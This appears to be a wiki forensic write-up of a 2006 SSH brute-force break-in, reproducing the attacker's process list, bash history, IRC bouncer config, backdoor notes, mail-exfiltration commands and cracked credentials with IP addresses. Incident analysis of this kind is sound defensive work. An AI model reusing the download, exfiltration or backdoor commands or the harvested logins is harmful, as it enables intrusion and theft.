Forensics on Incident 1

From YobiWiki
Revision as of 21:36, 24 November 2010 by <bdi>PhilippeTeuwen</bdi> (talk | contribs) (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Breach in ns0 @ e..oss

Analysis

ps auwx: 2006/03/17 +-20:20
========
test     30731  0.0  0.0   676  284 ?        S    00:21   0:00 ./ntpd
test     31116  0.0  0.2  2944 1360 ?        Ss   00:28   0:00 SCREEN
test     31117  0.0  0.2  3000 1228 pts/5    Ss   00:28   0:00 /bin/bash
test     31134  0.0  0.2  3164 1368 pts/5    S+   00:29   0:00 /bin/bash
test     32352  0.0  0.0  1444  280 ?        Ss   00:43   0:00 ./go
test     25680  0.0  0.2  2944 1412 ?        Ss   09:03   0:00 SCREEN
test     25681  0.0  0.3  3000 1656 pts/6    Ss   09:03   0:00 /bin/bash
test     25717  0.0  0.3  3160 1748 pts/6    S+   09:03   0:00 /bin/bash
test      4132  0.0  0.0  1344  204 pts/5    T+   10:40   0:00 ./go
test      4135  0.0  0.0     0    0 pts/5    Z+   10:40   0:00 [go] <defunct>
test      3211  0.0  0.0  1344  240 pts/5    T+   20:05   0:00 ./go
test      3224  0.0  0.0     0    0 pts/5    Z+   20:05   0:00 [go] <defunct>
test      4088  0.0  0.2  2704 1260 pts/6    S+   20:35   0:00 /bin/bash ./assh 24.35
test      4089 49.4  0.0  1492  456 pts/6    R+   20:35   4:43 ./pscan2 24.35 22
test      4090  0.0  0.0     0    0 pts/6    Z+   20:35   0:00 [pscan2] <defunct>
test      4097  0.0  0.2  2704 1260 pts/5    S+   20:35   0:00 /bin/bash ./assh 200.56
test      4098 49.4  0.0  1492  456 pts/5    R+   20:35   4:43 ./pscan2 200.56 22
test      4099  0.0  0.0     0    0 pts/5    Z+   20:35   0:00 [pscan2] <defunct>


Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
        31116.pts-4.ns0 (Detached)
        25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.

test@ns0:/root$ screen -r 31116

First screen:
=============
Copy of the current page:

bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)

Second screen:
==============
Copy of the full screen buffer:

test@ns0:/var/tmp/..  /dan$
test@ns0:/var/tmp/..  /dan$ ls
200               assh    gen-pass.sh  pass_file  sshf
200.221.pscan.22  auto    go           pscan2     ssh-scan
200.59.pscan.22   common  go.sh        ss         vuln.txt



bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)


test@ns0:/var/tmp/..  /2$ ./auto

Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/..  /2$ chmod +x 24
test@ns0:/var/tmp/..  /2$ ./24
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
...


Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/..  /2$ history
48 first line identical to .bash_history then
   49  ./auto
   50  chmod +x 24
   51  ./24

Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .."  "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .."  "
cd .."  "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .."  "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r  25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .."  "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e

Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)

Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
Netstat Abstract: (within the 800 simultaneous scans)
tcp        0      1 213.186.53.59:59930     24.35.236.71:22         SYN_SENT   4089/pscan2
tcp        0      1 213.186.53.59:60352     200.56.236.93:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60288     200.56.236.29:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60424     200.56.236.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60233     200.56.235.229:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60169     200.56.235.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60095     200.56.235.91:22        SYN_SENT   4098/pscan2


IRC:
====
* Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130
** = oslo1.no.eu.undernet.org
Netstat:
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN     30731/ntpd
tcp        0      0 213.186.53.59:34227     195.204.1.130:6667      ESTABLISHED30731/ntpd

Diffs between the downloaded tool and the hacker's version:

--- log/psybnc.log	1970-01-01 01:00:00.000000000 +0100
+++ log/psybnc.log	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,15 @@
+Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667
+Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731)
+Fri Mar 17 00:21:14 :Loading all Users..
+Fri Mar 17 00:21:14 :No Users found.
+Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan)
+Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de  dan
+Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat
+Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 ().
+Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 ()
+Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined)
+Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 ().
+Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 ()
+Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net)

--- motd/USER1.MOTD	1970-01-01 01:00:00.000000000 +0100
+++ motd/USER1.MOTD	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,71 @@
+:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL

+:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07

+:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST

+:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov

+:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server

+:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server

+:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers

+:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online

+:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s)

+:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed

+:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers

+:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day -

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Welome to Oslo*.NO.EU.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Disclaimer / Rules

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Irc is an umoderated international medium. Cloning is

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         strictly forbidden on this server, any clones will

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not be tolerated. Mass Messaging / Mass Invites are not

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         allowed on any Undernet server, any offenders will be killed.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Using this server means you agree to all of its rules and the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         rules of Undernet. If you cannot agree to this then /quit now.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Server contact info:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         E-mail     : oslo@undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     News:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.05.2005]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are out of news.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.12.2004]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We shut down the channel #banetele. Most of the users in there needed

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         reop/channel related helping and we have #nastrand for that. For info

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not related to channel/user problems, email oslo@undernet.org.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [26.08.2003]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are back online :)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Thank you to our provider www.banetele.com for all help!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Ports:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-                 6666, 6667, 6668, 7000

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Bot Policies:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         It is allowed to run NON abusive bots on this server, all abusive

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         bots will be killed on sight.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Undernet has Cservice. Go to http://cservice.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         or #Cservice if you have any questions.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Help Channels:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #nastrand       ->      Oper/IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #cservice       ->      Cservice questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #mIRC           ->      For mIRC questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #vh             ->      For help with viruses

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #helpchan       ->      IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Please notice that these channels are not administrated by the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         oslo.* crew and we and/or the server sponsors can not be held

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         responsible for actions taken or info given in the channels.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     AGAIN .. READ THIS !!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         The use of this server is no right, but a privilege. The admin(s)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         and opers can revoke this priviledge without further notice and

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         without a reason.

+:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command.


--- psybnc.conf	2003-04-07 14:47:00.000000000 +0200
+++ psybnc.conf	2006-03-19 23:32:53.000000000 +0100
@@ -1,3 +1,25 @@
 PSYBNC.SYSTEM.PORT1=6667
 PSYBNC.SYSTEM.HOST1=*

 PSYBNC.HOSTALLOWS.ENTRY0=*;*

+USER1.USER.LOGIN=dan
+USER1.USER.USER=x
+USER1.USER.PASS==0x'q'0'W`2'S0I'F`x
+USER1.USER.RIGHTS=1
+USER1.USER.VLINK=0
+USER1.USER.PPORT=0
+USER1.USER.PARENT=0
+USER1.USER.QUITTED=0
+USER1.USER.DCCENABLED=1
+USER1.USER.AUTOGETDCC=0
+USER1.USER.AIDLE=0
+USER1.USER.LEAVEQUIT=0
+USER1.USER.AUTOREJOIN=1
+USER1.USER.SYSMSG=1
+USER1.USER.LASTLOG=0
+USER1.USER.NICK=D-a-N
+USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
+USER1.SERVERS.PORT2=6667
+USER1.SERVERS.SERVER2=195.204.1.130
+USER1.SERVERS.PORT1=6667
+USER1.CHANNELS.ENTRY1=#porumbei
+USER1.CHANNELS.ENTRY0=#xibit


Backdoor:
=========
* ./go opens port 19876 with a shell without auth
cf http://www.2701.org/archive/200311240000.html
Netstat:
tcp        0      0 0.0.0.0:19876           0.0.0.0:*               LISTEN     32352/go

* ./ss
cf http://www.securiteam.com/tools/5EP0B0ADFO.html
Fast SYN Scanner (libnet, libpcap)  11 Jul. 2004
Credit:
The information has been provided by Doctor BIOS.
The following tool is a fast SYN scanner written in C.

vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt

ssh brute-force:
================
ssh-scan and sshf

./sshf <procese adika cate de alea deodata incerc>
~= how many processes to run together

/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false

mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go

139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
	for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023  Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038  Date: Fri, 17 Mar 2006 17:35:14 +0100

To-be-Mailed data:
administrator:administrator:24.16.169.218
guest:guest:24.16.169.218
test:test:24.3.178.253
mysql:mysql:200.27.145.74

root:admin1:200.31.199.77
root:password:24.8.131.152
root:secure:24.11.225.20

root:123456:200.32.86.228
root:1234567890:200.32.86.228
root:admin1:200.32.86.228
root:admin:200.32.86.228
root:administrator1:200.32.86.228
root:backup:200.32.86.228
root:passwd:200.32.86.228
root:password123:200.32.86.228
root:password:200.32.86.228
root:qwerty:200.32.86.228
root:root1:200.32.86.228
root:root:200.32.86.228
root:rootroot:200.32.86.228
root:secret:200.32.86.228
root:secure:200.32.86.228
root:administrator:200.32.86.228
(honeypot probably)

RST virus:
==========
Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos

Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go  Infection: Unix/RST.B
/tmp/scaner/pscan2  Infection: Unix/RST.B
/tmp/scaner/ss  Infection: Unix/RST.B
/tmp/scaner/ssh-scan  Infection: Unix/RST.B
/tmp/scaner/sshf  Infection: Unix/RST.B
Results of virus scanning:
Infected: 5

Seems that infected files are updating them at each run and modify the timestamp
/home/test/scaner:
  23714 2006-03-06 23:23 go
  25503 2005-05-06 19:00 pscan2
 458068 2006-03-07 00:03 ss
 846520 2006-03-07 00:03 sshf
 846832 2006-03-06 23:12 ssh-scan
/var/tmp/..  /2:
  23714 2006-03-17 21:17 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan
/var/tmp/..  /dan:
  23714 2006-03-17 10:35 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan

21:17 corresponds to the crash of the server so probably infected executables are left open even after being killed

Note: same virus present also in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND



TIMELINE:
=========

2006/02/16 08:58:08	82.79.137.30		vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client 		"82.79.137.30"
						Mar  6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
						Mar  6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
						Mar  6 12:29:31 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 06 06 12:30:50     4096 m.c drwxr-xr-x root     root     /etc/webmin
			            				        639 m.c -rw------- root     root     /etc/webmin/miniserv.conf
						Mar  6 12:31:05 localhost webmin[31297]: Webmin starting
						Mar  6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47	82.79.137.24	*	vsftpd: Mon Mar  6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client 		"82.79.137.24"
						Mar 03 06 15:53:30       21 m.c -rw-r----- root     shadow   /etc/webmin/miniserv.users
						Mar 03 06 16:11:31     4096 m.c drwxr-xr-x root     root     /etc/exim4
		    			    	                   7838 m.c -rw-r--r-- root     root     /etc/exim4/exim4.conf
						Mar  6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
						Mar  6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
						Mar  6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
						Mar  6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
						dorian12 pts/2        217.117.45.148   Mon Mar  6 21:38 - 21:40  (00:01)
						Mar  6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
						Mar  6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16	82.79.137.27		Mar  6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18	82.79.137.27		vsftpd: Mon Mar  6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/06 22:28:18	82.79.137.18		Mar  6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20	82.79.137.18		vsftpd: Mon Mar  6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client 	"82.79.137.18"
2006/03/06 22:28:29	82.79.137.25	*	vsftpd: Mon Mar  6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client 		"82.79.137.25"
2006/03/06 22:28:30	82.79.137.14	*	vsftpd: Mon Mar  6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client 		"82.79.137.14"
2006/03/06 22:28:39	82.79.137.22		Mar  6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro  user=test
2006/03/06 22:28:41	82.79.137.22		Mar  6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43	82.79.137.22 	*	Mar  6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43	82.79.137.22	*	Mar  6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28	82.79.137.22	*	test   pts/2        82.79.137.22     Mon Mar  6 22:28 - 00:21  (01:52)
2006/03/06 22:31:06	82.79.137.18		Mar  6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14	82.79.137.7	*	vsftpd: Mon Mar  6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client 		"82.79.137.7"
2006/03/06 22:40:54	82.79.137.22	*!	Mar 06 06 22:40:54   167818 m.. -rw-r--r-- test     test     /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35	82.79.137.22	*!	Mar 06 06 23:12:35   846832 m.. -rwxr-xr-x test     test     /home/test/scaner/ssh-scan
2006/03/06 23:23:56	82.79.137.22	*!	Mar 06 06 23:23:56    23714 m.. -rwxr-xr-x test     test     /home/test/scaner/go
2006/03/06 00:03:34	82.79.137.22	*!	Mar 07 06 00:03:34   846520 m.. -rwxr-xr-x test     test     /home/test/scaner/sshf
2006/03/06 00:03:34	82.79.137.22	*!	                       4096 m.. drwxr-xr-x test     test     /home/test/scaner
2006/03/06 00:03:34	82.79.137.22	*!	                     458068 m.. -rwxr-xr-x test     test     /home/test/scaner/ss
						skycode  pts/3        213.186.53.55    Tue Mar  7 00:14 - down   (00:45)
2006/03/07 00:21:24	82.79.137.22	*	Mar  7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
						skycode  pts/2        213.186.53.55    Tue Mar  7 00:58 - down   (00:01)
						runlevel (to lvl 6)   Tue Mar  7 00:59 - 00:59  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 00:59 - 01:02  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 01:02 - 08:45  (07:42)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 01:04 - 01:04  (00:00)     213.186.53.55
						skycode  pts/0        Tue Mar  7 08:28 - down   (00:16)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 08:45 - 08:45  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 08:45 - 08:48  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 08:48 - 09:18  (00:30)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 08:56 - down   (00:22)     213.186.53.55
						skycode  pts/1        Tue Mar  7 09:17 - down   (00:01)     213.186.53.55
						runlevel (to lvl 6)   Tue Mar  7 09:18 - 09:18  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:18 - 09:22  (00:03)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:22 - 09:25  (00:03)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:23 - down   (00:01)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:25 - 09:25  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:25 - 09:28  (00:02)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:28 - 09:44  (00:15)     2.4.27-2-386
						skycode  pts/0        Tue Mar  7 09:34 - down   (00:09)     217.136.140.81
						runlevel (to lvl 6)   Tue Mar  7 09:44 - 09:44  (00:00)     2.4.27-2-386
						shutdown system down  Tue Mar  7 09:44 - 09:48  (00:04)     2.4.27-2-386
						reboot   system boot  Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386
						runlevel (to lvl 2)   Tue Mar  7 09:48 - 01:03 (12+15:14)   2.4.27-2-386


2006/03/09 14:57:31	82.79.137.27	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client 		"82.79.137.27"
2006/03/09 14:57:31	82.79.137.26	*	vsftpd: Thu Mar  9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client 		"82.79.137.26"
